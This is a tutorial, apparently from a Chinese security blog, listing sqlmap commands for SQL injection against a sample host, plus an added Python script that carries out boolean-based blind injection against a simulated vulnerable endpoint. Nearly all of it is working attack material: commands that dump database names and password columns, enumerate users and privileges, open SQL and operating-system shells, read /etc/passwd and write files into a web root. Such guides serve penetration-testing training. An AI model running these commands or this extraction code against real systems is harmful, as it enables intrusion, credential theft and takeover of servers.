
Essential sqlmap commands: have you learned them yet?


This Wind


sqlmap is a dedicated SQL injection tool with a great many options; run "sqlmap -hh" for the full help text. What follows is just a selection of the most frequently used invocations. All of them run interactively and ask questions as they go; add "--batch" to accept the default answer to every prompt when you want an unattended run.

 

Part 1: Injection and enumeration

 

1. Test the injection point

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11"

Quoting the URL keeps the shell from interpreting characters such as "?" and "&"; sqlmap tests every GET parameter it finds in the URL.

 

2. Enumerate all databases

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --dbs

 

Enumerate only the database the application is currently using

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --current-db

 

3. List all tables in a given database

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" -D fujieace --tables

'fujieace' is the name of the database to enumerate (one of the names returned by --dbs).

 

4. List all columns of a given table

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" -D vhost48330 -T admin --columns

'vhost48330' is the database name and 'admin' the table name; both are placeholders for whatever the previous steps returned.

 

5. Dump the values of selected columns from a table

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" -D vhost48330 -T admin -C name,password --dump

'name,password' is the comma-separated list of columns to dump. sqlmap also saves the dump as a CSV file under its output directory.
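The five steps above hide what sqlmap actually has to do when the application only leaks a true/false difference (a row is shown or it is not). The following is an added example written for this page, not code from the original post and not sqlmap's own implementation: it recovers table names through a boolean-based blind injection by binary-searching the code point of each character, one request per comparison, which is the mechanism behind --tables. Assumptions not taken from the post: an in-memory SQLite database stands in for the target (the post's target is MySQL, where sqlmap would read information_schema.tables instead of sqlite_master), and `vulnerable_lookup` is a hypothetical endpoint that concatenates the `id` parameter into its query unsafely. The table names are constructed sample data.

```python
"""Boolean-based blind enumeration, the mechanism behind `sqlmap --tables`.

Added example for this page (not from the original post, not sqlmap code).
Assumption: SQLite stands in for the MySQL target and `vulnerable_lookup`
is a hypothetical vulnerable endpoint equivalent to sql.php?id=...
"""
import sqlite3
from typing import List

# Constructed sample schema standing in for the target's database.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    """
    CREATE TABLE admin (name TEXT, password TEXT);
    CREATE TABLE news (id INTEGER, title TEXT);
    INSERT INTO news VALUES (11, 'hello');
    """
)
_requests = {"n": 0}  # how many "HTTP requests" the enumeration cost


def vulnerable_lookup(id_param: str) -> bool:
    """Hypothetical vulnerable endpoint (the equivalent of sql.php?id=...).
    Returns True when the page would show a row: the boolean oracle."""
    _requests["n"] += 1
    query = f"SELECT title FROM news WHERE id = {id_param}"  # unsafe concatenation
    try:
        return _conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition: str) -> bool:
    """Turn a SQL boolean expression into a yes/no answer by appending
    `AND (<condition>)` to a value known to return a row (id=11)."""
    return vulnerable_lookup(f"11 AND ({condition})")


def blind_int(expr: str, lo: int = 0, hi: int = 255) -> int:
    """Binary-search the integer value of a scalar SQL expression in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(expr: str, max_len: int = 64) -> str:
    """Recover a string-valued SQL expression character by character:
    first its length, then the code point at each position."""
    length = blind_int(f"length({expr})", 0, max_len)
    return "".join(
        chr(blind_int(f"unicode(substr({expr}, {i}, 1))"))
        for i in range(1, length + 1)
    )


def enumerate_tables(limit: int = 32) -> List[str]:
    """Blind equivalent of `sqlmap --tables`: count the tables, then pull
    each name with LIMIT 1 OFFSET n (MySQL: information_schema.tables)."""
    count = blind_int(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table'", 0, limit
    )
    names = []
    for offset in range(count):
        sub = (
            "SELECT name FROM sqlite_master WHERE type = 'table' "
            f"ORDER BY name LIMIT 1 OFFSET {offset}"
        )
        names.append(blind_string(f"({sub})"))
    return names


def request_count() -> int:
    """Number of oracle requests issued so far; sqlmap reports this cost too."""
    return _requests["n"]


if __name__ == "__main__":
    print(enumerate_tables())  # ['admin', 'news']
    print(f"{request_count()} requests")
```

Each character costs about eight requests (a 0..255 binary search), which is why sqlmap prefers UNION- or error-based techniques when the target allows them and falls back to boolean- or time-based blind extraction like this only when it must.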

 

Part 2: Users and privileges

 

1. List the DBMS users:

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --users

 

Show the user the application connects to the database as:

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --current-user

 

2. Check whether the current user is a DBA:

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --is-dba

 

3. Enumerate user privileges (for all users, or for one user named with -U; "CU" stands for the current user):

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --privileges
root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --privileges -U fujieace

 

Part 3: File operations and shells

 

1. SQL shell

sqlmap can drop you into an interactive SQL shell in which you type statements and it runs them through the injection for you.

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --sql-shell
sql-shell> select version();

 

Note: since the SQL shell executes arbitrary statements, you can also read and write files from it with LOAD DATA INFILE, LOAD_FILE() and SELECT ... INTO OUTFILE (MySQL). These need the FILE privilege, and on MySQL they are further limited by the secure_file_priv setting, which on many current installs points at a single directory or disables file access altogether; check it with "show variables like 'secure_file_priv';" before assuming they will work.

 

2. OS command shell

sqlmap can also obtain an operating-system shell and run commands through it. Behind the scenes this relies on the database user being able to write files (the FILE privilege on MySQL) into a web root that sqlmap can locate, or on stacked queries, so it only works when Part 2 shows the corresponding privileges.

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --os-shell
root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --os-cmd=ipconfig

'ipconfig' assumes a Windows host; on Linux use something like 'id' or 'whoami'.

 

3. Read a file from the database server

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --file-read=/etc/passwd
root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --file-read=d:/test.txt

 

4. Write a local file to the database server

root@kali:/# sqlmap -u "http://192.168.1.104/sql.php?id=11" --file-write /test/test.txt --file-dest /var/www/html/test.txt

--file-write is the local file to upload; --file-dest must be the absolute path of the destination file on the server, not just the directory. As with the SQL shell, the write is subject to the FILE privilege and secure_file_priv.